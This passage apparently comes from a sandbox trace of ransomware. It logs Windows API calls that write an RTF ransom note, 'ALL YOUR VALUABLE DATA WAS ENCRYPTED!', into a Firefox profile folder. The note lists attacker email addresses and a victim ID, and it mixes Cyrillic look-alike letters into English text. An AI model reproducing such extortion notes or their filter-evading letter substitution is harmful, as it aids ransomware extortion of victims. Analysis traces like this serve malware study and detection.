\\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n¤#9#,&«\x1e­\x8c…?4kP@<õL\x88f#Öã\x9b\x1d\x8e\x8c¥Ù\x09,Z/µ×jd0\x88\x9d]8ÏgNFâ.Ä4ìïÎ1ð£\x0bkzsµ³[÷\x96\x1d\x0eÖ\x97\x8d\x07q?G\x16~\x03\x13\x88ª#C6ôaK=\x96\x0f%ǨæúpW¼\x88²pµ´ò{Îî(sÛ\x1cC\x01þáý\x9aYf}\x1e\x13£1/ø¡r$oÛ\x03Û/¤ê\x83\x0b{¸zu\x9c%2±VX*P\x1dZ\x95´Ñ-\x835\x8c\x8a¶ \"èÃÐì'\n\x91\x9ee<\rÜ.ß0©Ö\x18ù\x1b!o\x8aͶ\x1a\x1cnô\x04\x80´*+¯~ÐJ9*à²9+|¨ð\x1eò\x98Ó\x0b", lpUsedDefaultChar=0x0) returned 7247 [0067.688] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0067.689] CloseHandle (hObject=0x1bc) returned 1 [0067.690] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bg85_info.rtf")) returned 0xffffffff [0067.690] GetLastError () returned 0x2 [0067.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0067.691] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 